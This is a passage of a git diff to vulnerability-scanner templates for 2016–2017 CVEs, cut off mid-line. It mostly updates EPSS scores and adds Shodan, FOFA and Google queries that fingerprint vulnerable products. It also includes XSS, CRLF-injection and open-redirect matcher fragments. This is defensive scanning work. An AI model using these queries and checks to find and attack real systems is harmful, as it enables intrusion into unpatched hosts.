a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index 38766f39fb..f2782f9f85 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-10973 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54991 + epss-percentile: 0.54797 cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -50,4 +50,4 @@ http: - 'contains(body_2, "tab = alert(document.domain);")' - 'contains(body_2, "Brafton Article Loader")' condition: and -# digest: 490a004630440220056398545c7971a832b6a0a6562ed13c279b426e0b8783134e5536c67d1a589d0220409848bc2ce496563f76afcdeb4851709c338b118dba11b50c81cefc0a171f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220794dbf512a1810009e7cd3e7bbb640cd76c0dc11d6c8f18bd09c931247485bc0022100e47ff8d6c0f657e433480f8453d0ef5bdb478696a22d503a10f7fb8a3976a91a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 34b85f7428..66ecc307a6 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -6,31 +6,30 @@ info: severity: medium description: | WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Apply the latest security patch or update to the ScoreMe Theme to fix the XSS vulnerability. reference: - https://www.vulnerability-lab.com/get_content.php?id=1808 - https://wpvulndb.com/vulnerabilities/8431 - https://nvd.nist.gov/vuln/detail/CVE-2016-10993 - https://github.com/0xkucing/CVE-2016-10993 - https://github.com/ARPSyndicate/cvemon + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patch or update to the ScoreMe Theme to fix the XSS vulnerability. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2016-10993 cwe-id: CWE-79 - epss-score: 0.00245 - epss-percentile: 0.62591 cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:* + epss-score: 0.00245 + epss-percentile: 0.64569 metadata: - max-request: 1 - vendor: scoreme_project - product: scoreme framework: wordpress + max-request: 2 + vendor: "scoreme_project" + product: scoreme tags: cve2016,cve,wordpress,wp-theme,xss,scoreme_project - flow: http(1) && http(2) http: @@ -64,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205a861ba8febc9300fb6d1aa1ed02ef760e621783766ea29d336f8ac3dd2e10e2022035d451e147d56cdaf09231f43635e84b6263c7e74ec48c0fa59272f97264a0a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f319130cf7f3120fea1c4c0d9fa2d0eef9c3cc8172527a5a2d2aadf7f8dcec0a02206d561e52b06dcd2d43d21d8051af220f4d7caa73706af1900b4c860eb285ed24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index b90433e242..e49e1523c5 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1555 cwe-id: CWE-77 epss-score: 0.97373 - epss-percentile: 0.99898 + epss-percentile: 0.99904 cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a0047304502202a0af6f4b5b74c37d86cf262d279ecf9a06914ec33fb6e7db00c710f0982ce60022100c68322772ed60b940af582741ea7d2816782e2641a7d654e563aa82ab3aedf98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204478df4d956ba1393b007b7d82f7002f9054f7f3b400190b8bf3097228d2735602207904edcf73de6619898d2e0d33cca582c04caa2d5a5d8003959520e439b8b17a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index 7767adc2bf..3a523d10c6 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: sap product: netweaver - shodan-query: http.favicon.hash:-266008933 + shodan-query: + - http.favicon.hash:-266008933 + - cpe:"cpe:2.3:a:sap:netweaver" + fofa-query: icon_hash=-266008933 tags: cve2016,cve,packetstorm,seclists,lfi,sap,edb http: @@ -44,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c0981ae3808610bcc8a7e8ab312d25bcf72ea0bb9e117d81d415d2632ad6ad3e022100e803bbfa6008004d6a0443f4c9e37201bf5b214ac7106ebdd2b96672c45ea5df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008144b205c7662e0eca54703fa0e4517f6d11721064f2154aaff062ea256ac77002207d8fc8e109ec4a413f84f95841098e75be2fa5a326723d345568ac7f40cac57f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index b3519b5695..8b8c1068f9 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -28,6 +28,15 @@ info: max-request: 1 vendor: apache product: struts + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" + google-query: intitle:"struts2 showcase" tags: cve2016,cve,struts,rce,apache http: @@ -45,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ac77a59d24373f8a33371c90c7e4275bd9cbd672278167a927b6b04d2066a1c4022100dc07b95c4a8afd4591d4fb49d9ac62d4cb34ac923b85398daa0a4e82aad7710d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f249d8327e7598cab13dcc19957029827adea67bbb01e416bf51e525fc45fcc502203045dd4bd1dbfa58072b11e5bce342c736dd55a8aaf13aa8a34a4779b7952b80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index fbbabd7b21..5c2d8820fc 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2016-3088 cwe-id: CWE-20 epss-score: 0.83955 - epss-percentile: 0.98392 + epss-percentile: 0.98478 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: activemq + shodan-query: + - cpe:"cpe:2.3:a:apache:activemq" + - product:"activemq openwire transport" tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive variables: rand1: '{{rand_int(11111111, 99999999)}}' @@ -49,4 +52,4 @@ http: - "status_code_2==200" - "contains((body_2), '{{rand1}}')" condition: and -# digest: 490a0046304402206b7bd3e2e8e6558b6bd1ed2ed9786d1aa61b2f80c5153900102307acfbd8680302204f6528318fe66f51da0b6a08ecc218072d115dbdc42a066c07081d1a0dc1c58d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf71dfa43973a168508db9de8e123853306c617b25b2d8b76575042c5d8071a9022004dbec1f986db202f8678ebd43e6e7c5d04be5dc379324109cdd7b7a52ed0928:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index 9c1dd44d28..a55361e715 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -26,6 +26,14 @@ info: max-request: 1 vendor: fortinet product: fortios + shodan-query: + - http.html:"/remote/login" "xxxxxxxx" + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - port:10443 http.favicon.hash:945408572 + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: cve2016,cve,redirect,fortinet,fortios,seclists http: @@ -38,4 +46,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402201e517dd06332c852dc9e8a03d12eb20c9636dfc194690a007024ef333e978dba022062abb7e6dbc6349bc055a6faeffa048a2b20388fd1893538783af9670b6e35e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dfb451f1430bd798d8d15f5045f30686fdb0b3c7a2fe21f569f26afb2a5e2b3702200ae3988919f8f0ea43447bbc60c4f6cc6e22a1bb49695358fe81e80a1f7122d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 5f4e61ccec..ee1e08fdf4 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -20,12 +20,15 @@ info: cve-id: CVE-2016-4975 cwe-id: CWE-93 epss-score: 0.00399 - epss-percentile: 0.70799 + epss-percentile: 0.73471 cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: http_server + shodan-query: + - cpe:"cpe:2.3:a:apache:http_server" + - apache 2.4.49 tags: cve2016,cve,crlf,apache,xss http: @@ -38,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' -# digest: 4a0a004730450220591243f64cba0b0c03d215d27b7a16783b2fbfb438d316dddf5577fd604ee4ed022100bf652b4a095563057b28cc33ac56040cc57495913b1ae8057328d07775384658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204a4f853132fc47007d8b7a9c89e088543fae0c12d6b37f4c7d90d2f3836d12d502206094d2fb2affbe34ef1792acc1f9faab2fa02ecb413184dd98be51a5df745ad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index 07d97735ed..f3e9708cd8 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2016-4977 cwe-id: CWE-19 - epss-score: 0.03345 - epss-percentile: 0.91147 + epss-score: 0.04558 + epss-percentile: 0.92501 cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 400 -# digest: 4a0a00473045022100a996c40fae1f6d19435d135651a1168704634ae606188ed97fef12f4c8a2d3f6022016d0ce56e41a19dd65b863a46c1d4351dbf1e34b890044f16642401ec20f6b0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c66dd438fc32b601bda760d115a1aa6c0ac04c6d508e25af37bed49c7dccb6bb0220745ce2c6eb5aa672f5d9903bf30440d9a7a166a1bc7b45ca0aed623a32b0d181:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-5674.yaml b/http/cves/2016/CVE-2016-5674.yaml index 57d085ae5e..e3caf0d599 100644 --- a/http/cves/2016/CVE-2016-5674.yaml +++ b/http/cves/2016/CVE-2016-5674.yaml @@ -14,17 +14,18 @@ info: cvss-score: 9.8 cve-id: CVE-2016-5674 cwe-id: CWE-20 - epss-score: 0.95705 - epss-percentile: 0.99378 + epss-score: 0.95793 + epss-percentile: 0.99431 cpe: cpe:2.3:a:netgear:readynas_surveillance:1.1.1:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: netgear - product: readynas_surveillance - fofa-query: app="NUUO-NVRmini" || app="NUUO-NVR" || title="Network Video Recorder Login" - tags: cve,cve2016,nuuo,rce - + product: "readynas_surveillance" + fofa-query: + - "app=\"NUUO-NVRmini\" || app=\"NUUO-NVR\" || title=\"Network Video Recorder Login\"" + - app="nuuo-nvrmini" || app="nuuo-nvr" || title="network video recorder login" + tags: cve,cve2016,nuuo,rce,netgear variables: rand: "{{to_lower(rand_text_alpha(32))}}" @@ -50,4 +51,4 @@ http: - "contains(body_2, 'Debugging Center')" - "contains(body_2, 'Windows IP')" condition: and -# digest: 4a0a004730450220385c9c6da58edd672651a5e46895e146cc465ebca8ee3b813d44d6f616d0c378022100811021f1ae97e681a6f84ee297e881a5e855bfaa37a652ccc045f2cee6aa21b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022077af93ab3f7b752a3fc8676fad34d3fd997fd438917a7cc5242af60fab4ca1bc022100b67d707d34c5e15724fcfcc966c4e550015f2255b50e624eca23d3323cb0c9b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 76c43f3f6e..4c73a3b5e4 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -22,14 +22,25 @@ info: cve-id: CVE-2016-6195 cwe-id: CWE-89 epss-score: 0.00284 - epss-percentile: 0.68042 + epss-percentile: 0.68612 cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* metadata: verified: "true" max-request: 6 vendor: vbulletin product: vbulletin - shodan-query: title:"Powered By vBulletin" + shodan-query: + - title:"Powered By vBulletin" + - http.html:"powered by vbulletin" + - http.component:"vbulletin" + - http.title:"powered by vbulletin" + - cpe:"cpe:2.3:a:vbulletin:vbulletin" + fofa-query: + - body="powered by vbulletin" + - title="powered by vbulletin" + google-query: + - intext:"powered by vbulletin" + - intitle:"powered by vbulletin" tags: cve2016,cve,vbulletin,sqli,forum,edb http: @@ -56,4 +67,4 @@ http: - 200 - 503 condition: or -# digest: 4a0a00473045022030269809613dc16694046c59ac978b011cbcc0e3fdc2021ebc2f19473ff08068022100b0d29f698de04fa6315694bcfc2096e474fd1b4c198284198f2a52cc101320bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220657adc2a38a598c9c739307271e03f60bac84ec0fdd7b8fe171bf030497bdbf9022100dc7cf4e7c541e2871d54b2f929d4b94f40eccd5bc9e4637374eeb4f9c48c2530:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index bbc45b58dd..6fd8963aa0 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2016-6277 cwe-id: CWE-352 - epss-score: 0.97471 - epss-percentile: 0.99962 + epss-score: 0.97464 + epss-percentile: 0.9996 cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220486802970cc24d96538b869531c7a01ec169cb576278c3edad08fb0b3171abc802206eba1c836af2a9bbfbf9b2fc2efec581afdaeb05159f11aa43a1a80f99cc78df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205b219494263614b882b91badcb1fa30b4b9d68ad57c90001d4439fed26dbaacd0221009b1a8d86efd5251ef6612985e55dc7136fc3f386dcb718907aa4e0b7c6f95e11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index 96c42c3ebd..8abab8f195 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2016-6601 cwe-id: CWE-22 - epss-score: 0.97503 - epss-percentile: 0.99977 + epss-score: 0.97504 + epss-percentile: 0.99983 cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220269d98ed6d3161ad0db0a03a7f0809a5f7c818c3ecc57b34ee4d3d4c63eaab40022100e6f5a74ea3414e32776536a764ae0baf50b8f383108184f7d3181f2b5d68cc24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f4a1e8dd56ed0a8a6a8cc9692b37edef8295462b12b7782b3d8f2fd6e36bdf6e022100b9383b27f28dad89a9fc7bd50b400de9f676c75677f6ff6598c66b338ac76b43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index 016d2dad45..a632a4e242 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-7552 cwe-id: CWE-22 epss-score: 0.96711 - epss-percentile: 0.99632 + epss-percentile: 0.99651 cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d53117f3ea16788cf89c0cecf2d555cae0b79a93d5d3180b39cc4454040ef18d022100cd583d6df3b9dc10200910934624925f94565c114f1dd531e1cd98adc07c4544:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205edf4891203be2e982cb79823b11b89eb92d074d01b239e68fc73f47ff65a61702204967e0b4fc76d68dc0ff070d2513427e927cd8dafc5ab0c6c40780cd82096d32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index b621310690..9b318c2185 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2016-7834 cwe-id: CWE-200 epss-score: 0.00186 - epss-percentile: 0.55032 + epss-percentile: 0.55834 cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -50,4 +50,4 @@ http: - type: status status: - 204 -# digest: 490a0046304402202f5f026ed0363e14939a797e8be1ba25052d97aeffbf9c4028fab947ee7964bc0220162d36ff26de6a7b2d99f415da04726f6316c88fb6f54a668f3814dff2f37ff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ea189d4111ce75b717caf6baa54c2cb449e250724b15b5f1a2934cb764686a52022100de80a7c031ac58a9b9240444c1264db7db65571a60326e0de3c82f6541d0bdb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 565495b0d6..b23222551e 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -22,12 +22,16 @@ info: cve-id: CVE-2016-7981 cwe-id: CWE-79 epss-score: 0.00258 - epss-percentile: 0.63488 + epss-percentile: 0.6548 cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: spip product: spip + shodan-query: + - http.html:"spip.php?page=backend" + - cpe:"cpe:2.3:a:spip:spip" + fofa-query: body="spip.php?page=backend" tags: cve2016,cve,xss,spip http: @@ -50,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ee1a0cc74545408c97919b9f1220c0b8a04761f7969c872553fdf8d567516a3a022100a2caf1a3d02114b0e49b46a81c7ac45c62019029e4395dfa4ac12a9aa89935ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203d479598e86902b6858e73b449d89b3490d625bad56ae942557c461c84fe7f7902201df02b61b476180a451165d2c7410439679f666fdb8deea3dd998b584506213d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index 2da0f6239e..08f0b059a6 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -14,13 +14,14 @@ info: - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt - https://www.exploit-db.com/exploits/41482/ - https://nvd.nist.gov/vuln/detail/CVE-2016-8527 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-8527 cwe-id: CWE-79 - epss-score: 0.00166 - epss-percentile: 0.53225 + epss-score: 0.00117 + epss-percentile: 0.45479 cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e0553f487ee2d58071813a5309f9348e9ca2cdaac784386a59e8c2d365bd1b7b022100de464f52b41938c66aeb7e2a014a9e466ad67eab9b926ec68cf7196538177e40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9346e18bfb4c4d6a1081d41f4cd34352fa4d926162744dcc66b0333f6cb0b7f022100a130940d70233629a33858b36b594b16b3fac8249e1612e0dbee3f832cce06f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index cd9341263b..26fee7b905 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: dnnsoftware product: dotnetnuke + fofa-query: app="dotnetnuke" tags: cve2017,cve,dnn,dotnetnuke,hackerone,oast,ssrf,dnnsoftware http: @@ -44,4 +45,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100a4588a8ca315453fd4058b17fc6b55294a5808948ad8e2a8ca6bc69acb3a6908022012c6ab4acc691ef16efbdbde3fab9cb0c476ae2aced25ad2a4669b8f2c7f2556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100befaa1c664964744dd1d8c6722277a114b6f2fa28380c244ba22f633b8e4853f022100b73c8d2c36b64be027b558818fd39677eca39927dc0b235c7aa625e51ff7af1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index 31c0a4ce81..c65c4c1cff 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -19,12 +19,13 @@ info: cve-id: CVE-2017-1000028 cwe-id: CWE-22 epss-score: 0.97516 - epss-percentile: 0.99984 + epss-percentile: 0.99986 cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:* metadata: max-request: 2 vendor: oracle product: glassfish_server + shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server" tags: cve,cve2017,oracle,glassfish,lfi,edb http: @@ -50,4 +51,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 4a0a004730450220197143a221aff60682e5920e186b66ea318c0512f0d5433a907b9ece724df88b022100beab5d9053b43e2cac58d92a26aa2bdfec85b9cee740d246284232c2ba59e90e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043d669b8b16a7809a014436363971008a066d6a54fbf8c71dbf3c34fca79a32f022044e14f43dee98fa0e180c5fe9276af9dca155fc864c7276e775e79ec1ac7eefa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index cff57e655a..aa79fb0c3b 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -25,6 +25,7 @@ info: max-request: 1 vendor: oracle product: glassfish_server + shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server" tags: cve,cve2017,glassfish,oracle,lfi http: @@ -41,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202b1ecb4a01d3db488f18d88e30890c01ab67d73172dcd959724ffd53e260af84022100d6f4a9096dc94f23108e95c441641bdee5d1b3a9ca2b8fd037cca63a94e1a6dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201d60e48b7384c0d1a88028a170cb3cfc91c63564ea817b87f9aa16c2e22f6277022100bd3d6df440665b69e2ed8f8e6bb14d03cea04068bdad5c4a9d18fbda46d3fe4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index d81d35df5f..9d65bed09f 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -15,12 +15,13 @@ info: - http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940 - https://nvd.nist.gov/vuln/detail/CVE-2017-10075 - http://www.securitytracker.com/id/1038940 + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2017-10075 epss-score: 0.00451 - epss-percentile: 0.72424 + epss-percentile: 0.75082 cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:* metadata: verified: true @@ -55,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022010819a8a794f7913d5769d0d2a2fb4cb18e8bfc192f008923949764b6ee09b0902202313e8489672702f7e45dda26b24f2fc2e13a050288074feb90d080e5f3965af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220136c0d583ed2e4adb2dd235c30da23fd33f94e875621e8280c11bd82d39cd70502201c341e9c1a91f9cfbb120bf3f1a7a78b252f9a411ca56d43d46ae1a82a471290:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index f1070a0a21..9f226413a4 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -27,6 +27,11 @@ info: max-request: 2 vendor: oracle product: weblogic_server + shodan-query: + - http.title:"oracle peoplesoft sign-in" + - product:"oracle weblogic" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2017,weblogic,oast,kev,vulhub,rce,oracle http: @@ -107,4 +112,4 @@ http: - body == "{{randstr}}" - status_code == 200 condition: and -# digest: 4b0a00483046022100cc1685ff29667003d078f1649e722afd7019dd57bfcb94fd210d4624aebdf5fd022100adcdc269c9a84770a1817b96f2a5513541930282e2cdb048fdf74c9e31f8e4d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dbc988dec280ae59d70dd9568151c35de08505ec2657bd5fb53b55597d9e7240022100c1ecb47b8e895d85b2418fce0272190b9547b94f1b18fc6549e32bedce5fe4c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index 5bdccda632..5540260593 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -15,13 +15,14 @@ info: - https://packetstormsecurity.com/files/143328/DataTaker-DT80-dEX-1.50.012-Sensitive-Configuration-Exposure.html - https://www.exploit-db.com/exploits/42313/ - https://nvd.nist.gov/vuln/detail/CVE-2017-11165 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-11165 cwe-id: CWE-200 epss-score: 0.94336 - epss-percentile: 0.99027 + epss-percentile: 0.99189 cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +30,8 @@ info: vendor: datataker product: dt80_dex_firmware shodan-query: http.title:"datataker" + fofa-query: title="datataker" + google-query: intitle:"datataker" tags: cve2017,cve,lfr,edb,datataker,config,packetstorm,exposure http: @@ -53,4 +56,4 @@ http: - type: status status: - 200 -# digest: 